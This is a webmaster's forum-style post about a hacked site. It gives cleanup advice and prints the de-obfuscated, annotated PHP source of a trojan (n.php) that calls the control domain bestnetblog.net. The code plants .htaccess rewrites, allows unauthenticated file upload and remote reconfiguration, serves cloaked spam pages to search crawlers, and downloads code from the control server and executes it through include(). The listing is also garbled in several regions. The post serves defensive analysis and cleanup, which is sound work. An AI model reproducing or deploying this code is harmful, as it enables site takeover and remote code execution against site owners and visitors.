A client of mine had the same problem.
Do a malware scan and do not use CuteFTP or any other popular FTP program. All those passwords you had are now stolen. Clean your PC and request new FTP passwords for all your sites, and use KeePass to store them
Here is the disassembled file (n.php) that makes calls to http://bestnetblog.net/logdomain.php?q=alcobro to log the trojan activity.
Files known to be infected:
n.php
/.log/ this folder is sometimes created, delete it.
.htaccess will be overwritten, check it.
Check every index.php and .html file for the img tag.
<?
// NOTE: this listing lost its `$` and quote characters during extraction; read `_GET[q]`
// as `$_GET['q']`, and `round(0+...)` sums as obfuscated small integer constants (here 0).
// Error output is disabled so the script fails silently on the infected host.
error_reporting(round(0));
// Requests are only processed when `q` matches this character class; this is the sole
// input filter in the whole script and it also gates the dom100500/up100500 commands below.
if (isset(_GET[q]))
{
if( !(preg_match("/^([a-z0-9-.)(&=]*)/i", _GET[q])))
{
die;
}
}
// l__0(): HTTP fetch helper used for every callback to the control server and for the
// Google scraping below. Uses curl when available, otherwise file_get_contents().
// The numeric curl option ids are CURLOPT_URL (10002), CURLOPT_HEADER (42),
// CURLOPT_RETURNTRANSFER (19913), CURLOPT_FOLLOWLOCATION (52), CURLOPT_TIMEOUT (13),
// CURLOPT_PORT (3) and CURLOPT_USERAGENT (10018); the round() sums evaluate to 0, 1, 1, 20, 80.
if (extension_loaded(curl) &&function_exists(curl_init) &&function_exists(curl_exec))
{
function l__0(_0)
{
_1 =curl_init();
curl_setopt(_1, 10002, _0);
curl_setopt(_1, 42, round(0));
curl_setopt(_1, 19913, round(0+1));
curl_setopt(_1, 52, round(0+0.25+0.25+0.25+0.25));
curl_setopt(_1, 13, round(0+6.66666666667+6.66666666667+6.66666666667));
curl_setopt(_1, 3, round(0+80));
// Spoofed browser User-Agent; it is one string literal whose quotes were lost in extraction.
// The same string can be used to pick the script's outbound requests out of proxy logs.
curl_setopt(_1, 10018, Mozilla/4.0 (compatible;
MSIE 6.0;
Windows NT 5.2;
SV1;
.NET CLR 2.0.50727;
InfoPath.1));
_2 =curl_exec(_1);
// 2097154 is CURLINFO_HTTP_CODE; any status >= 400 (round(0+200+200)) is treated as a failed fetch.
_3 =curl_getinfo(_1, 2097154);
if (_3 >
= round(0+200+200)) _2 = false;
curl_close(_1);
return _2;
}
}
else if(function_exists( file_get_contents))
{
// Fallback with no timeout or status check: file_get_contents() on a remote URL.
function l__0(_0)
{
return file_get_contents(_0);
}
}
else die( not work);
// Per-host working directory .log/<HTTP_HOST without leading "www.">/, created world-writable
// (round(0+255.5+255.5) and round(0+127.75*4) are both 511 == 0777). The .log/ folder named in
// the cleanup notes above is created here.
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
@mkdir( .log/);
@chmod( .log/,round(0+255.5+255.5));
@mkdir( .log/._4);
@chmod( .log/._4,round(0+127.75+127.75+127.75+127.75));
// xmlrpc.txt holds the control-server domain; it is seeded with bestnetblog.net on first run
// and is read back by every later callback, so a different domain in this file means the
// operator has re-pointed the infection (see the dom100500 handler).
_5 = .log/._4. /xmlrpc.txt;
// Intentionally empty branch: the file already exists (the read handle is never closed).
if (@fopen(_5, r))
{
}
else
{
_6 =fopen( .log/._4. /xmlrpc.txt, w+);
fwrite(_6, bestnetblog.net);
fclose(_6);
}
// ?q=alcobro : install / check-in command (the access-log line at the end of this page is one).
// When no .htaccess exists, it writes one that routes every request for a non-existent file or
// directory to this script as ?q=1, so the whole site becomes a doorway. It then reports the
// host name to <control domain>/logdomain.php and prints the fetch result plus "enable"/"disable".
if ( _GET[ q] == alcobro )
{
_5 = .htaccess;
if (file_exists(_5))
{
_7 = disable;
}
else
{
// Rewrite rules as one string literal (quotes and line breaks mangled by extraction):
// RewriteEngine On / RewriteCond %{REQUEST_FILENAME} !-f / RewriteCond %{REQUEST_FILENAME} !-d /
// RewriteRule ^(.*) <SCRIPT_NAME>?q=1 [L]. A rule of this shape in .htaccess is a strong indicator.
_8 = " RewriteEngine On RewriteCond %
{
REQUEST_FILENAME
}
!-f RewriteCond %
{
REQUEST_FILENAME
}
!-d RewriteRule ^(.*) "._SERVER[ SCRIPT_NAME]."?q=1 [L] ";
_9 =fopen( .htaccess, w+);
fwrite(_9,_8);
fclose(_9);
_7 = enable;
}
// The control-server domain is read from xmlrpc.txt rather than hard-coded here.
curlit =file_get_contents( .log/._4. /xmlrpc.txt);
_11 = http://.curlit. /logdomain.php?q=._SERVER[ HTTP_HOST];
_12 = l__0(_11);
echo _12._7;
die;
}
// ?dom100500=<domain> : remote reconfiguration of the control-server domain in xmlrpc.txt.
// There is no authentication beyond the `q` character filter at the top; it answers "100500ok".
// The strings dom100500 / up100500 / shab100500 / 100500ok are useful log and file grep terms.
if (_GET[ dom100500] != )
{
_13 =fopen( .log/._4. /xmlrpc.txt, w+);
fwrite(_13,_GET[ dom100500]);
fclose(_13);
echo 100500ok;
die;
}
// ?up100500=1 : unauthenticated file upload. The multipart field `uploaded` is saved under its
// original basename in the script's own directory and a bare upload form is printed. Any file in
// that directory whose mtime post-dates the infection should be treated as attacker-supplied.
if (_GET[ up100500] != )
{
_14 = ;
_14 = _14 .basename( _FILES[ uploaded][ name]) ;
// _15 is assigned (value 1) and never used.
_15=round(0+0.5+0.5);
if(move_uploaded_file(_FILES[ uploaded][ tmp_name], _14))
{
echo up100500;
}
// One HTML string literal; the `<` characters were split onto their own lines by extraction.
echo '<
form enctype="multipart/form-data" method="POST">
<
input name="uploaded" type="file">
<
input type="submit" value="U">
<
/form>'
;
die;
}
// l__1(): builds the cloaked "doorway" page for one keyword. It scrapes Google web search result
// snippets, Google Images and Google Suggest for the keyword and assembles them into HTML.
// NOTE(review): the region between the first for-loop and `_27 = _25;` is badly garbled by
// extraction. The class header of l__2 (a word-chain text generator: each word maps to the words
// that followed it, and l__3 walks that map at random) and parts of its methods are missing, so
// the exact text-generation logic cannot be recovered from this listing.
function l__1(_16)
{
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
// Keyword comes straight from ?q=; the second assignment to _18 discards the first one.
_17 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
_18 =str_replace( -, +,_17);
_18 =str_replace( _, +,_17);
// 100 Google web results for the keyword; the <div class="s"> snippets are harvested as source text.
_19 = http://www.google.com/search?hl=en&as_q=._18. &num=100&as_qdr=all;
_20 = l__0(_19);
preg_match_all( #<div class="s">(.*)<br>#U,_20,_21);
_22=array();
// --- garbled from here: loop header and the start of the l__2 class are lost ---
for (_23=round(0);
_23<
="" _31;
="" ++_32)="" _33="_28[_30][_32];
" this-="">
// Builds the word -> following-word map (round(0+0.2*5) == 1, i.e. the next token).
_26[_33][] = _28[_30][_32+round(0+0.2+0.2+0.2+0.2+0.2)];
}
}
_34 =array_keys(this->
_26);
foreach (_34 as _17)
{
this->
_26[_17] =array_unique(this->
_26[_17]);
}
}
// l__3(_35): generates pseudo-text by random walk over the word map; sentences of
// mt_rand(5, 12) words, short trailing words dropped, punctuation trimmed, first letter upper-cased.
// The loop at L161-L163 of the listing is truncated, so the inner walk is only partly visible.
function l__3(_35)
{
_36 = round(0);
for (_30=round(0);
_36 <
_35;
++_30)
{
_37 =array_rand(this->
_26);
_38 =mt_rand(round(0+1.25+1.25+1.25+1.25), round(0+4+4+4));
for (_32=round(0);
_32_26[_37][mt_rand(round(0),count(this->
_26[_37]) - round(0+0.5+0.5))];
if (_40 == ) _40 =array_rand(this->
_26);
_37 = _40;
if (_37 == ) break round(0+0.5+0.5+0.5+0.5);
}
}
// Post-processing of each generated sentence (array of words) into the output string _43.
foreach (_39 as _41)
{
_42=count(_41);
if (_42<
=round(0+2)) continue;
if (strlen(_41[_42-round(0+0.5+0.5)]) <
round(0+0.8+0.8+0.8+0.8+0.8)) unset(_41[_42-round(0+0.333333333333+0.333333333333+0.333333333333)]);
_41[_42-round(0+2)] =rtrim(_41[_42-round(0+2)], ,:;
);
_41[_42-round(0+0.25+0.25+0.25+0.25)] =rtrim(_41[_42-round(0+0.25+0.25+0.25+0.25)], ,:;
);
_43 .=ucfirst(implode( , _41)). . ;
}
_43 =str_replace( ., ., _43);
return _43;
}
}
// --- end of garbled class region; back inside l__1 ---
// Generate roughly 1400 (round(0+466.67*3)) units of filler text and strip everything except
// letters, ".", ",", space and "-".
_27 = _25;
_44 = new l__2(_27);
_45 = _44->
l__3(round(0+466.666666667+466.666666667+466.666666667));
_45 =preg_replace( /[^a-zA-Z\\., -]+?/, , _45);
// Human-readable keyword (_46) and its "+"-joined query form (_47).
_46 = isset(_GET[ q]) ?str_replace( /, ,urldecode(_GET[ q])) : FALSE;
_46=str_replace( -, ,_46);
_46=str_replace( _, ,_46);
_47 =str_replace ( , +, _46);
// ?page=N maps to Google Images start offset (N-1)*21.
if(_GET[ page] != 1)
{
_48 = &start=.(_GET[ page]-round(0+0.5+0.5))*round(0+10.5+10.5);
}
_49 = l__0( http://images.google.com/images?q=._47. &lr=lang_en._48);
preg_match_all( /href="?\\/imgres\\?imgurl=([^\\&]+)/, _49, _50);
_51 = array();
// --- loop header garbled below; it appears to walk previously cached .log/<host>/*.html pages
// and build cross-links (_57) between the generated doorway pages ---
for (_32 = round(0);
_32 _54 ) break;
preg_match_all( #^\\.log/._4."/(.*).html#i", _58, _59 );
_57 .= <a href="._53._59[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace( _, ,str_replace( -, , _59[round(0+0.5+0.5)][round(0)])). ">.str_replace( _, ,str_replace( -, , _59[round(0+0.333333333333+0.333333333333+0.333333333333)][round(0)])). </a>, ;
_56++;
}
// Google Suggest completions for the keyword become further internal links (_64),
// stopping after the counter passes 11 (round(0+2.75*4)).
_60 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= .str_replace( , %20, _46));
preg_match_all( |\\["([^"]+)",|si, _60, _61, 1);
_62 = round(0);
array_shift(_61[round(0+0.2+0.2+0.2+0.2+0.2)]);
foreach (_61[round(0+0.333333333333+0.333333333333+0.333333333333)] as _63)
{
_64 .= <a href='._53.str_replace( , -, _63). ' title='._63. '> . _63 . </a>, ;
if (_62++ >
round(0+2.75+2.75+2.75+2.75)) break;
}
_65 = _53._GET[ q];
// --- garbled: the assignment to _66 and a loop header are cut. What survives finds the longest
// match in _73 that contains no <script> tag, inserts a <REPLACEME> placeholder after it and
// writes the result to _70 (presumably the shab100500.txt template used later; confirm) ---
_66 = <
_72;
_32++ )
{
if ( (preg_match( /\\<
script/imsU, _73[round(0)][_32]) == round(0)) AND (strlen(_73[round(0)][_32]) >
_74) )
{
_74 =strlen(_73[round(0)][_32]);
_75 = _32;
}
}
_71 =str_ireplace( _73[round(0)][_75], _73[round(0)][_75]. <
REPLACEME>
, _71 );
_76 =fopen( _70, w );
fputs(_76, _71);
fclose(_76);
}
// Final page: <h1>KEYWORD</h1>, suggest links, cached-page links, image markup (_69, origin lost
// in the garbled region) and the generated filler text in a <p>.
_77 = <
h1>
.strtoupper(_46)._78. <
/h1>
._64._57. ._69. <p>._66. </p>;
return _77;
}
// l__4(_79): doorway-page cache. Pages are stored as .log/<host>/<keyword>.html<page> and
// served verbatim when present; otherwise l__1() generates one and it is written to the cache.
// Every file matching that pattern is generated content that can be deleted during cleanup.
function l__4(_79)
{
_4 =preg_replace( /^www\\./, , _SERVER[ HTTP_HOST]);
_80= .log/._4. /._79 . .html._GET[ page];
if(@file_exists(_80))return@file_get_contents(_80);
// Both replacements start from _79, so the "-" substitution on the first line is discarded.
_16=str_replace( -, ,_79);
_16=str_replace( +, ,_79);
_81=l__1(_16);
_82=@fopen(_80, w);
@fwrite(_82,_81);
@fclose(_82);
return _81;
// Unreachable: the function has already returned.
_83=file_get_contents(_80);
}
// Cloaking: visitors whose first two IP octets match one of these prefixes get the generated
// doorway page instead of the site. The prefixes appear to be search-engine crawler ranges
// (66.249. is Googlebot's, 65.55. msnbot's, for example) plus loopback (127.0.) and 31.43.;
// the match uses only two octets, so it is coarse.
_84=array( 66.228., 67.195., 68.142., 66.196., 68.180., 72.30., 74.6., 66.94., 66.163., 64.75., 216.32., 66.163., 65.52., 65.53., 65.54., 65.55., 66.249., 66.102., 209.85., 72.14., 74.125., 64.68., 64.233., 216.239., 173.194., 91.184., 94.231., 127.0., 31.43.);
_85=getenv( REMOTE_ADDR);
_86=explode( ., _85);
// Walks the prefix list until the first NULL (end of array).
for (_32=round(0);
;
_32++)
{
if(_84[_32]==NULL) break;
_87=explode( ., _84[_32]);
if(_87[round(0)]==_86[round(0)]&&_87[round(0+0.333333333333+0.333333333333+0.333333333333)]==_86[round(0+0.333333333333+0.333333333333+0.333333333333)])
{
if(_GET[ q]!= )
{
// shab100500.txt is the page template; if it is missing or under 800 bytes (round(0+200*4))
// a minimal built-in skeleton with a <REPLACEME> placeholder is used instead.
_70 = .log/._4. /shab100500.txt;
if (filesize(_70) <
round(0+200+200+200+200) )
{
_71 = <
head>
<
title>
title<
/title>
<
/head>
<
body>
<
REPLACEME>
<
/body>
<
/html>
;
}
else
{
_71 =file_get_contents( _70 );
}
// <title> becomes the keyword (from ?q=, minus "-" and ".html") and a
// <meta name="googlebot" content="noarchive"> tag is added so the doorway is not cached publicly.
_88=basename(_GET[ q]);
_46 = _GET[ q];
_46=str_replace( -, ,_46);
_46=str_replace( .html, ,_46);
_71 =preg_replace( /<
title>
(.*)<
\\/title>
/imsU, <
title>
.ucwords(_46). <
/title>
<
meta name="googlebot" content="noarchive">
, _71 );
// The placeholder is filled with the (cached) doorway page for this keyword.
_71 =str_ireplace( <
REPLACEME>
, l__4(_88), _71 );
print _71;
exit;
}
}
}
// Non-crawler visitors with ?q= set. Two paths both end in `include()` of .log/<host>/iog.txt,
// a file whose contents are downloaded from the control server: because include() executes PHP,
// the operator can run arbitrary server-side code on the host by changing what badcompany.php
// returns. iog.txt is therefore the key artefact to preserve for analysis before cleanup.
if (_GET[ q]!= )
{
// Opera users get the payload unconditionally, wrapped in <script> tags.
if (strpos(_SERVER[ HTTP_USER_AGENT], Opera) !== false)
{
echo <
script>
;
include( .log/._4. /iog.txt);
echo <
/script>
;
die;
}
// A referer containing "site%" is left alone (empty branch).
if (strpos( _SERVER[ HTTP_REFERER], site% ) >
round(0) )
{
}
else
{
// Visitors arriving from google./yahoo./bing. search results get the payload. Note the
// precedence: `> round(0)` applies only to the bing. test; the other two are plain truthiness.
if (strpos( _SERVER[ HTTP_REFERER], google. ) ||strpos( _SERVER[ HTTP_REFERER], yahoo. ) ||strpos( _SERVER[ HTTP_REFERER], bing. )>
round(0) )
{
// Refresh iog.txt from <control domain>/badcompany.php?q=<host><script path> when it is
// missing or older than 1800 s (round(0+10*3)*round(0+15*4)).
_89 = round(0+10+10+10)*round(0+15+15+15+15);
_90= .log/._4. /iog.txt;
if(!file_exists(_90)||time()-filemtime(_90)>
_89)
{
curlit =file_get_contents( .log/._4. /xmlrpc.txt);
_91 = http://.curlit. /badcompany.php?q=._4._SERVER[ SCRIPT_NAME];
_2 = l__0(_91);
_92 =fopen( .log/._4. /iog.txt, w+);
fwrite(_92,_2);
fclose(_92);
}
echo <
script>
;
include( .log/._4. /iog.txt);
echo <
/script>
;
die();
}
}
}
// Everyone else (direct visitors, no matching referer) is bounced to the site root, which is why
// the infection is easy to miss when checking the site by hand.
header( Location: http://._SERVER[ HTTP_HOST]);
?>
Grep:
Attack log example:
91.200.240.10 - - [02/Apr/2011:05:30:48 +0200] "GET /11.php?q=alcobro
This IP is used to monitor activity; it is probably a hacked machine as well.